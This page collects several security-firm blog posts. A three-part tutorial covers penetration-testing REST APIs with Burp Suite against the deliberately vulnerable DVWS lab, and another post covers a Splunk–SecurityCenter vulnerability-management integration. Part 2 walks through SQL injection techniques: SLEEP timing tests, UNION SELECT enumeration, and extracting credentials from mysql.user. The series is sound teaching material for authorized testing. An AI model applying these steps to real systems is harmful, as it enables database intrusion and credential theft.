Innovative Minds - On Point - One Group  

MindPoint Group Blog

06
Dec
2018

REST Assured: Penetration Testing REST APIs Using Burp Suite: Part 3 – Reporting

By:

Welcome back to the REST Assured blog series for Part 3: Reporting. While often overlooked by security professionals, compiling reports is almost always required among penetration testers post-testing. That’s why today we’re going to review how to put all of our findings together and have a thorough paper trail.

Reporting

Using Burp Suite, it’s relatively easy to generate dumps of all the tests that were performed by using Intruder. Making it human-readable is another thing. In the Intruder window, select Save > Results Table. Burp Suite will generate a pop-up from which a number of options may be chosen. Here are my recommended configurations based on the attacks we performed:

Due to the nature of how we tested, Burp Suite isn’t able to automatically associate an intruder-based attack with a vulnerability and remediation strategy. So, unfortunately, it’s on us to parse the reviews manually and flag any anomalies worth including in a remediation strategy. To make the output file easy on the eyes, my recommendation would be to use Microsoft Excel, create a new spreadsheet, go to Data > from text/csv> and choose the output file we just created. From there, Excel should start an import wizard. Make sure you select “Edit” to verify the data has columns. Since some of our attacks include commas, we had to use tab as a delimiter. So, from the editing window choose “Split column,” and from the delimiter pull-down, make sure Tab is selected and hit OK. If it looks okay, hit close and load. We should now have a workable table that includes every attack we performed except for the repeater attacks, which I’ll get to in a minute.

Next, we need to include the server’s responses to each of these attacks. This is where our throttling comes from in part 1 of this blog series when we were configuring Burp Suite to slow down its automated scans. Although it adds a lot more testing time, it is 100% required if we want our server response packets in an order that matches the Request# from our first set of data from the attacks. To do this, from the Burp Suite Intruder window, select Save > Server Responses. Create a folder for the server responses and make sure “Concatenate to a single file” is NOT You’ll see why in a second.

In Excel, go to the Data tab again > Get Data > From File > From Folder. Select the folder we just saved the responses to and click OK. Make sure to click Edit when it shows us the import. On the Content column header, click the button circled in red below.

In the pop-up, choose on the delimiter pull-down to choose “Tab.” Then Click OK, then Save & Load. From here you should have a workable data-dump of every packet that you can now order in the “name” column which will match the Request Number of the previous data set. So now we have an exhaustive, sortable spreadsheet of all the attacks we attempted in the intruder scan.

Reporting on the repeater testing we performed is super easy. All we need to do is select the body of the request inside Burp Suite, right-click > Save Item. It’s that easy. Make sure to uncheck Base64-encode requests and responses,” as this will ensure the packets are human readable. We’ll have to do this for all the requests of value that we used in the penetration test, but Burp Suite will save them as an XML file and they’re relatively easy to parse and include everything in both sent and received packets.

That should be it as far as generating our paper trail! Everything is accounted for and documented in our testing.

Although we only really focused on conducting SQL injection testing, you can use this blog as a logical guide with other tests such as Cross-Site Scripting and Cross-Site Request Forgery.

Both are excellent reads and I highly recommend them.

In conclusion I hope you enjoyed following along in this blog series learning about how to test these RESTful API services as more and more service providers keep promoting these interfaces. I think they’re wonderful personally, as they can extend so much functionality to the people who use them; however, as we just found out, testing them can require some extra steps.  Feel free to comment on this blog or reach out to me on social media with any questions or comments! I really appreciate you taking the time to stop by and hopefully learn a thing or two about conducting your own, safe penetration tests on RESTful APIs using Burp Suite!


Interested in learning more about our Proactive Security Services?  Click this link

Categories: Application Security, Cyber Security, ISP Blog, Pen Test, Vulnerability Assessment, Vulnerability Management and tagged , , ,
Share:
 

MindPoint Group Blog

18
Nov
2018

REST Assured: Penetration Testing REST APIs Using Burp Suite: Part 2 – Testing

By:

Welcome back! In part 1 of REST Assured blog series, we discussed the definitions and history behind APIs, and we reviewed the proper configuring of Burp Suite for conducting security testing against them. In Part 2 of the blog, we’re going to be getting into the fun part: Testing.

Testing

I’ll preface the testing first by mentioning that it’s important to have familiarity with the HTTP status codes to help us better understand how the server is handling our attack packets. Below is a subset of HTTP status codes from OWASP that can be used as a point of reference:


Status code Message Description
200 OK Response to a successful REST API action. The HTTP method can be GET, POST, PUT, PATCH or DELETE
201 Created The request has been fulfilled and resource created. A URI for the created resource is returned in the Location header
202 Accepted The request has been accepted for processing, but processing is not yet complete
400 Bad Request The request is malformed, such as message body format error
401 Unauthorized Wrong or no authentication ID/password provided
403 Forbidden It’s used when the authentication succeeded but authenticated user doesn’t have permission to the request resource
404 Not Found When a non-existent resource is requested
406 Unacceptable The client presented a content type in the Accept header which is not supported by the server API
405 Method Not Allowed The error for an unexpected HTTP method. For example, the REST API is expecting HTTP GET, but HTTP PUT is used
413 Payload too large Use it to signal that the request size exceeded the given limit e.g. regarding file uploads
415 Unsupported Media Type The requested content type is not supported by the REST service
429 Too Many Requests The error is used when there may be DOS attack detected or the request is rejected due to rate limiting
500 Internal Server Error An unexpected condition prevented the server from fulfilling the request. Be aware that the response should not reveal internal information that helps an attacker, e.g. detailed error messages or stack traces.
501 Not Implemented The REST service does not implement the requested operation yet
503 Service Unavailable The REST service is temporarily unable to process the request. Used to inform the client it should retry at a later time.

source URL: https://www.owasp.org/index.php/REST_Security_Cheat_Sheet)

So, given this information, let’s take a look at some of my results and see if you can see anything odd or unusual:

The very first request here (Request 0) is our control, and there isn’t any modification to the original request, so it returned what we were expecting. However, if you look closely at the other attack packets, their status is all HTTP 200. If that truly is the case, then this application has a major problem with how it handles these attacks as they shouldn’t be getting HTTP 200 statuses (they should be 400 at the API level or 404 since we’re messing with the URL). Let’s take a closer look at some of these.

Yikes! This would be pretty bad to see in the real world. This type of error is specifically generated by the database, MariaDB, which means that we have successfully touched the backend of the system through this interface. Now it’s just a matter of time until we’re able to get something other than errors. Also, now we understand why it’s returning HTTP 200; the API processed the request, but the backend SQL threw an error. Looking at the error message it looks as though the “a” in the payload was taken as it’s not in the response, which makes me believe the parameter we’re attacking is supposed to be an integer, not a character. It’s also possible the rest of the injection is breaking the backend requests, which is a good sign as an attacker. Let’s look at an attack that starts with an integer.

Well, there you have it. The whole table was dumped. We knew ahead of time that this particular service was vulnerable to this attack though, so let’s look at some other findings that would serve as a more practical test:

For this attack we tried to inject a “sleep” command, which just tells the database to wait a set number of seconds; however, we’re not 100% sure what happened. The database didn’t throw an error, but it didn’t return anything either. This result is a common example of a finding that requires follow-up. I turned on the columns that show us the response time to give us an idea. I don’t believe we successfully injected a sleep statement based on the response time, but if we right-click this attack, we can forward it to the repeater to make our own changes to help us dig deeper into what is happening.

Here you can see the response time of our request is 13 milliseconds (bottom right of response), so the command isn’t taking, but it’s not throwing errors. Let’s try messing with some things:

In the request above, we can see that encoding our characters is getting translated in the response. We’ve also learned through the error messages that this database is running MariaDB. Let’s include the integer value for the user ID before our attack this time and see what happens:

Bingo. We successfully got the MariaDB server to execute the command “SLEEP(5)” and we verified it in the response time it took (5 seconds) on the bottom right of the response. The SLEEP command is an extremely common way of testing for Blind SQL Injection due to the somewhat Boolean response from the server itself. The sleep timer either worked or it didn’t. The successful execution of the “SLEEP” command can enable us to gain more information about the database’s syntax and get a deeper understanding of what is happening behind the curtain. Let’s pretend we didn’t dump the table already and take this a step further now that we’ve succeeded in injecting commands and see how far the rabbit hole goes.

So, we did a couple of things here. The first thing we did is add “1=2” after the AND, which basically modifies the original query to not return anything (it’s returning false). The false statement is important because we want to count how many columns the query is selecting by injecting our own “UNION SELECT” command. Here we start with a single “NULL” value. Notice in the response that the database is saying that’s not the right number of columns selected. Let’s keep adding NULL values until we get something that takes (assuming we didn’t already know a valid query returns two columns).

Okay, so now we know we have the correct number of columns selected for this specific query. Once we have the correct format for our commands, we can use this as a blueprint for some nastier things, such as:

Ah-ha! Success! By adding @@version in place of a NULL value, we’re able to increase our understanding of the database itself. Moving forward:

Using @@datadir we can determine this is a Windows OS hosted database due to the file structure. This hosted operation system can be useful for later attacks if we ever try to grab any system files or folders (If this were linux we could later try to grab/etc/passwd for example). Let’s check on the account that the database itself is using to give us an idea of its privileges.

That’s convenient. Looks like a stock root account (a default setup for DVWS which explains the insecurities in this configuration). Now for my favorite part, stealing account credentials!

Above we modified the UNION SELECT command to select users and their passwords from “mysql.user” which is where the user account information is stored. You’ll notice in this test instance, the account passwords (listed in the “last_name” fields) are blank, which is due to the stock setup of DVWS. If this were a live or test system, we would (hopefully) be seeing the hashes of their passwords there. With that information we can conduct off-line brute forcing or using a rainbow table to crack the hashes. There’s a number of existing tools to assist with cracking the hashes (hashcat, John the Ripper, etc.), but we’ll leave that to a future discussion. Next up, let’s look at the list of databases:

You can see here that we’re continuing to modify the values we’re selecting, and in this case we selected “schema_name” from “information_schema.schemata.” This will return us with a list of all the databases running on the server: dvws, information_schema, mysql, performance_schema, phpMyAdmin, and test. Now going deeper, let’s investigate the columns for each of these:

It’s possible to extend this command to continue cleaning up the type of information shown here, but you can see where we’re going. We can continue to modify this attack, a request at a time, until we’re able to dump everything from each database which we have access to. Once we learned this was a MySQL server, we can use that to guide us into making the modifications to the attack query, and targeting its syntax and structure. I’m fairly confident that we could even modify this search query to do things like dump every database and its contents to a file, then return it to us, considering we already determined we can execute privileged commands. Dumping the contents to a file could give us as attackers plenty of time to go over the content if we were worried about generating excess logs or if time is of the essence. I think this is a safe place to end our SQL injection testing since we pretty much proved we can now do anything we want with the MySQL server.

What’s Next?

This will conclude Part 2: Testing of the REST Assured blog series. Stay tuned for Part 3 on reporting where we’ll learn how to put everything together into manageable data sets and wrap up this series.


Interested in learning more about our Proactive Security Services?  Click this link

Categories: Application Security, Cyber Security, Pen Test, Vulnerability Assessment, Vulnerability Management and tagged , , ,
Share:
 

MindPoint Group Blog

14
Nov
2018

REST Assured: Penetration Testing REST APIs Using Burp Suite: Part 1 – Introduction & Configuration

By:

Introduction:

Hello and welcome to our 3-part blog series where we will take a dive into the technical aspects of conducting exhaustive penetration tests against REST API services and generating reports based on what tests were performed and what our findings are. Due to the subject matter being relatively technical, I’m taking some assumptions in the reader’s knowledge base in that they’ll be at least familiar with the concepts behind conducting penetration testing and vulnerability analysis. That said, if you happen to have a RESTful API service that you’re looking to conduct a penetration test against, then make sure to stick with us as we dig into the specifics for how to make sure you leave no stone unturned. Part 1 will be covering the dos and don’ts of configuring and optimizing our scan engine to make sure we’re set for success. Part 2 will consist of the actual penetration testing itself, and Part 3 will be on formatting our results and generating a detailed report. I hope this series will be helpful to my fellow security enthusiasts of all skill levels. Please feel free to reach out to me or comment below if you ever have any questions or comments and I’ll make sure to help in any way I can. Now let’s get started!

History: What is an API?

More and more companies have been expanding their target audience by extending their host of web services to others and providing interfaces for automated services, such as a Single Sign-On (SSO) using an Application Programming Interface (API). APIs typically provide all the same services that a web application of the same provider supplies, just without the use of a graphical interface. APIs are meant to act as an interface for answering automated requests, typically provided by processes instead of people. Because of this interface, a specific ruleset exists for being able to communicate with an API correctly, and in this blog we’re going to be looking at how to properly test these services for security vulnerabilities using Portswigger’s tool, Burp Suite.

Why Burp Suite?

Burp Suite is an incredibly powerful web application proxy that also performs security vulnerability analysis.  Many security experts will tell you that it provides you with the most return on your investment. For a mere $350 license, you can unlock the “Pro” mode and hack to your heart’s content, which is something many of their competitors can’t say. It isn’t, however, without its shortcomings. Configuring and using Burp Suite to provide you with the results you are looking for can be difficult for anyone not well versed with the ins and outs of the types of attacks that are to be tested; even more so when conducting penetration tests on web APIs.

Rules of Engagement

Before we begin, it’s important to note that due to the nature of this blog, I assume the reader understands the correct use-case scenarios for when penetration testing is and isn’t allowed against a host service, and thus I and MindPoint Group are not responsible for actions taken on the reader’s behalf. I shouldn’t have to say this, but only use these instructions to test APIs that you are permitted to test, either your own or your customers (if you have a written Rules of Engagement (ROE) agreement outlining the scope of your testing!). If you are new or interested in entering the penetration testing or vulnerability analysis field, please comment at the end of this blog or reach out to me personally and I’d be happy to help you get started down the right path.

Now, disclaimers aside, let’s begin:

The scope determines how the penetration test is performed and how much we may or may not know about the RESTful API service in question. For whitebox and greybox tests, we could have full documentation, use-case scenarios, and even stock JavaScript Object Notation (JSON) request tokens outlining the structure of the HTTP packets the API accepts. For blackbox tests, however, we’ll have to build our packets through trial and error using API debugging/mapping tools, such as Postman, and by capturing valid requests/responses using Burp Suite as a proxy service. Due to time constraints of most tests, it’s usually more cost effective to aim for whitebox tests. Whitebox tests provide the assessor with all the information they need so they can correctly identify and focus on attacking the weakest links as quickly and effectively as possible. Also, due to the destructive nature of the types of tests we’re conducting, it’s important that all parties involved understand the risks of these types of tests we’re conducting and that we’re testing only targets in the specified scope.

For the case in this blog, we’re going to be using Damn Vulnerable Web Service (DVWS) for our test scenarios.  It’s a very simple and easy to use webservice that supports a vulnerable RESTful API we can test.

Reconnaissance

Starting any typical penetration test will involve a substantial amount of research, typically referred to as information gathering. Ask questions such as: What is the target’s digital footprint? Where is the target’s lowest hanging fruit? These are the questions we’re most interested in answering first.

  • Browsing
    • Typically, you usually won’t be able to find API services by simply navigating a site and finding a link. While google hacking is a little outside the topic of this blog, there are a plethora of ways to discover APIs for a targeted host site. A number of different API aggregators or search engines exist (such as our friends at ProgrammableWeb.com), which would be a great place to start to see if a target’s API has been publicly cataloged or documented. We can also leverage Burp Suite’s web spider functionality to try to discover API pages. After manually navigating your target’s website while capturing traffic into Burp’s proxy and adding the site to your selected scope (right-click the target site in Target>Site Map, add to scope), perform a crawl by selecting the host URL and right-click > Spider this host. Once complete, if we navigate to the root of the site and sort the results by MIME type. We can look for JSON, which could indicate a RESTful API.

  • Postman
    • I’ve picked up the use of Postman (https://www.getpostman.com) through some developers I know that use it to help with their debugging throughout the API development process. I’ve found it to be quite useful and it can assist us in a similar manner of getting started with known-good API requests, and then we can begin our testing from there. The API we’re testing in DVWS is extremely simple, but in the real world you can expect to see JSON requests full of variables and parameters and look something like the following request:

    • Next, we can configure Postman to communicate correctly to the host API:

    • We can then permit the proxy service to enable Burp Suite’s proxy to capture the traffic, allowing us to start getting our hands dirty:

  • Burp Suite
    • Now, let’s send a known-good request to our target API through Postman and verify we captured it in Burp Suite:

    • If we right-click anywhere in the raw message, we can send it to a number of different parts of Burp Suite, but let’s start by sending it to Repeater. From here we can use Burp Suite’s Repeater function as basically our own Postman and we can replay this packet any number of times, performing minor manual tweaks and observing the response. Using Burp Suite’s Repeater, I’ll take the time to check the server’s responses to our requests while I make minor changes to the packet in different areas to see what types of error messages the server responds with. Once I get a feel with how many different types of error messages and responses the application yields, I’ll right-click the body of the known-good request and send it to the intruder. This is where it gets interesting.

Configuring

First, before we dive into the depths of the hands-on parts, I feel it’s necessary to do some of the configuring I’ll expand on below. These recommendations are all based on trial and error on my part for dealing with Burp Suites’ lack of good reporting features. It’s one thing to conduct an exhaustive penetration test, and it’s another thing to have thorough, well-defined start and stop points on what tests were and were not performed, and what their results were. All that said, I feel that Burp Suite is lacking when it comes to API vulnerability reporting, which is unusual considering their regular write-ups are relatively good for its vulnerability analysis end. Not to be worried though! With my help, I’ll have you impressing your bosses’ boss with the amount of metrics we can show them to back up our claims.

On the Intruder > Positions tab, make sure Attack Type is set to “Sniper.” This is important when it comes to generating our report, as this will fire attacks off in sequential order making our packets sent/received much easier to interpret what attack triggered what response.

Make sure to correctly define your positions by selecting all of your parameters and clicking “Add §.” This will tell Burp Suite where exactly in the message it will conduct its injections. In this test scenario, we’re telling Burp to inject in the URL parameter number for the user value, but most tests will also select parameters in the body. The Sniper attack will work through each of these positions sequentially, top-to-bottom. So when we look at the results and it says “attack position: 1” it will be the first “§” value we defined.

Now, on to the Payloads tab. This is where some of your personal preference will come into play. I prefer to separate my types of penetration tests apart as it makes reporting and logging much easier. So, we’ll be breaking up SQL injections from XSS injections, for example. Because of this, we want to separate out the payloads. Under Payload Options, there’s a pulldown for “add from list.” We’ll want to select “Fuzzing – SQL Injection.” Keep in mind we’ll have to go through each attack type and generate separate reports for each type. Later, we can add them together as one giant report if we want, but we want to make sure we don’t miss anything. Also, it’s worth noting, If we wanted to use another list of attacks, we can certainly import something like Wfuzz’s wordlists of attacks. Feel free to go as deep in this category as you want. The more attacks the merrier! The Payload Processing in Burp Suite gives us additional options to do things such as character replacement for things like “<yourservername>” and “<youremail>” to substitute with a string that is applicable for the attack. Flip through the different lists to get a feel for what characters you want to substitute and with what. It’s also possible to encode/decode our attack strings to bypass things such as input filtering. If no attacks are working, keep cycling through these options to see if anything is even possible with these options.

So we’re almost ready to start, however there’s one last thing I’d strongly advise doing: throttling. I’d recommend changing these values from the default under options: Number of threads: 1, Throttle (milliseconds): 20.

This configuration will be different for every API. Also, I will warn you that Burp Suite will do something a little odd here, and this took me way too long to figure out on my own than I’d like to admit, but my only way to combat it was to use a single thread and throttle it. When exporting your results (post-scan), Burp Suite will store the responses from the target in a different order than it lists in the attack results window. The first 10-15 results should be in the same order; however, if you navigate to Save > Server Responses, the order of the response packets will almost always be out of order by the time you get to the 40th or so packet. I’m not 100% sure on why this happens, but in my testing I believe it happens when one of the thread’s requests takes longer to process than another’s request, so that the response ends up out of order on the received end in the proxy. Burp’s session management throughout the testing maintains the session information correctly, but I think the proxy or logging isn’t maintaining the order properly. So, when a data dump of the responses is generated, Burp dumps the packets in the order they were received, not paired with the correct request number. It really is unfortunate because this causes larger-scale scans to take significantly longer, but if you care about providing accurate artifacts at the end of your testing, it is necessary. If reporting isn’t your thing, then you can skip this step.

What’s Next?

In this blog, we reviewed configuration of Burp Suite. In our Part 2 of this blog series, we’ll review testing. In Part 3, we’ll review reporting.

 


Interested in learning more about our Proactive Security Services?  Click this link

 

Categories: Application Security, Cyber Security, Pen Test, Vulnerability Assessment, Vulnerability Management and tagged , ,
Share:
 

MindPoint Group Blog

18
Jul
2018

A Tale Of Two Tools: When Splunk met SecurityCenter

By:

Co-Authors:  Keith Rhea and Alex Nanthavong

It was the best of times, it was the worst of times, it was the age of technological advancements, it was the age of attack, it was the epoch of cybercrime, it was the epoch of opportunity, it was the season of Remediation, it was the season of Exploitation, it was the spring of Security, it was the winter of Vulnerability. We had targets and queries before us, with the data all going direct to SecurityCenter, while the queries were all staying in Splunk — in short, the race between attackers’ access to exploits and defenders’ ability to assess, remediate and mitigate them remained a never-ending cycle. The usefulness and identification of new vulnerabilities could no longer rely on either tool operating independently of each other. When Splunk met SecurityCenter, the alerts of outstanding vulnerabilities were received for remediation before compromise and helped to stay ahead of exploitation.[1]

With the integration of security tools, vulnerability management programs can improve the security posture of cloud environments. Tenable Research published a study that measured the difference in time between when an exploit for a vulnerability becomes publicly available (Time to Exploit Availability (TtEA)), and when a vulnerability is first assessed (Time to Assess (TtA)). The delta, negative or positive, indicates the window of opportunity (or lack thereof) for an attacker to exploit an unknown vulnerability. The researchers used a sample set for this analysis based on the 50 most prevalent vulnerabilities from nearly 200,000 unique vulnerability assessment scans over a 3-month period in late 2017, the findings from the researchers below indicate that attackers have a significant advantage over defenders.

As migration to the cloud and adoption of cloud business models increase, the introduction of cloud assets to those environments is constantly increasing and decreasing. Traditional forms of asset tracking are woefully inefficient in highly dynamic cloud environments. This extends to traditional vulnerability management systems and techniques as well. In order to improve the TtA, the implementation of continuous vulnerability assessments can be used. However, that alone is not enough to fully mitigate the nightmare of performing effective vulnerability management in these rapidly changing environments. Analysis of vulnerability scanning behavior for most organizations indicates that just over 25 percent of organizations are conducting vulnerability assessments with a frequency of two days or fewer. Contrary to popular belief, a successful vulnerability management program includes more than just a snapshot in time scan of an environment. While point in time scanning is an achievable first step for most organizations, that will reduce the head start that attackers have for most vulnerabilities, it still leaves a negative delta and exposure gap for many vulnerabilities. The impact of this exposure gap can be significant depending on the vulnerabilities in question. Shortening the window between scans and moving towards continuous or near real-time vulnerability scanning will have the most positive impact on the TtEA vs TtA time delta.

Not only should regular scanning occur, but there needs to be careful analysis of the vulnerabilities identified to determine the risks associated with those vulnerabilities, dependent on any compensating controls available in the environment. This analysis provides the basis behind the determination of the remediation timeframes. Everyone agrees that vulnerability management is a necessary function of an effective security practice, in our experience however this is not enough to combat the speed at which attackers move. We advocate for organizations to shorten the vulnerability scan cycle time as much as possible, while also improving upon traditional, static asset tracking by gathering data dynamically from sources like cloud infrastructure APIs and CMDBs. As Dickens says, as if he were a Security Officer, “Nothing that we do, is done in vain. I believe, with all my soul, that we shall see triumph.”[1]

Achieving Better TtA via Integration of Splunk and SecurityCenter

MindPoint Group security engineers were able to enhance all phases of their vulnerability management program by integrating Splunk and Tenable SecurityCenter. This integration allows the team to gather asset data via the cloud infrastructure API and correlate that data with near real-time vulnerability data. The team is now able to adapt and react more quickly to the rapidly evolving threat landscape in highly dynamic operating environments. The correlation and analysis of vulnerabilities within a highly dynamic cloud environment is made possible by using SecurityCenter to scan, consolidate, and evaluate vulnerability scans across the organization, and Splunk to aggregate vulnerability data, asset data, and other sources of events and log data from various components of a large cloud environment. With all these sources of data ingested real-time into the Splunk environment, reports and alerts can now be generated to provide in-depth, on-demand vulnerability data to address potential threats as they are discovered.

So How Does it Work?

Security tooling is important, and having tools configured and operating correctly is an important first step for a security team. The effectiveness of individual security tools is greatly reduced when they operate independently of each other, and many security teams greatly increase their effectiveness by working to integrate existing tools, processes, and data sources, instead of buying yet another tool. The diagram above  illustrates the vulnerability management process and the components needed to integrate SecurityCenter, and Splunk. This integration is important because it provides security teams with the ability to move beyond the old standards and methods of periodic vulnerability scanning. Integration of these two tools, provides security teams with an enhanced view of their data for improved aggregation, searching, and reporting capabilities. An enhanced vulnerability management approach based on an agile, API driven, DevSecOps model is necessary to decrease the TtA vulnerabilities and ultimately shorten the time delta for defenders. Each tool plays a crucial role in the overall integration of the two and enables security teams to have more actionable information to ensure timely remediation.

Once scan data, cloud asset data, and other data sources have been fed into Splunk we are able to use the following query:


index=tenable severity.name=* (
    [ search index=tenable scan_result_info.name!=*DEAD* scan_result_info.name!=*Security* (scan_result_info.name=GC* OR scan_result_info.name=COMM*)
    | rename scan_result_info.name as ScanName
    | convert num(scan_result_info.finishTime) as time
    | eval finish=strftime(time, "%Y-%m-%d %H:%M:%S")
    | dedup ScanName
    | table ScanName finish scan_result_info.id
    | return 15 scan_result_info.id])
    | lookup aws-instances.csv private_ip_address as ip
    | search tags.ApplicationID=* accountName=* tags.op_env=*
    | stats count

From within Splunk we are then able to produce reports, alerts, and dashboards to provide development, operations, and security teams with in-depth, on-demand vulnerability data to address potential threats as they are discovered. Alerts can be customized so that they are generated using the remediation and prioritization criteria mandated by an organization.

Once security teams are continuously alerted and armed with vulnerability data, they are better able to align operational processes to support rapid response and ad hoc remediation and mitigation requests outside of regular maintenance and patch windows. Those efforts for targeted remediation and prioritization can be better focused on vulnerabilities with publicly available exploits and those actively being targeted by malware, exploit kits and ransomware.

This enables up-to-date situational awareness and threat context to evaluate true risk and exposure as well as to inform and guide decision making. By leveraging the integration of Tenable, Splunk, and AWS, vulnerability, configuration, and asset data can be used to conduct deep security analysis, and achieve the awareness, perspective and information needed to make effective security decisions.

References:

[1] Dickens, C. (1867). A Tale of two cities, and Great expectations (Diamond ed.). Ticknor and Fields, Book 1, Chapter 1: The Period

[2] Dickens, C. (1867). A Tale of two cities, and Great expectations (Diamond ed.). Ticknor and Fields, Book 2, Chapter 16: Still Knitting

Quantifying the Attacker’s First-Mover Advantage. (2018, May 24). Retrieved June 1, 2018, from https://www.tenable.com/blog/quantifying-the-attacker-s-first-mover-advantage

Categories: Architecture and Engineering, Cloud, Configuration Management, Cyber Security, Engineering and Architecture, ISP Blog, Qualitative Analysis, Quantitative Analysis, Risk Assessment, Risk Management, Vulnerability Assessment, Vulnerability Management and tagged , , , , , , , , , , , , , , , , ,
Share: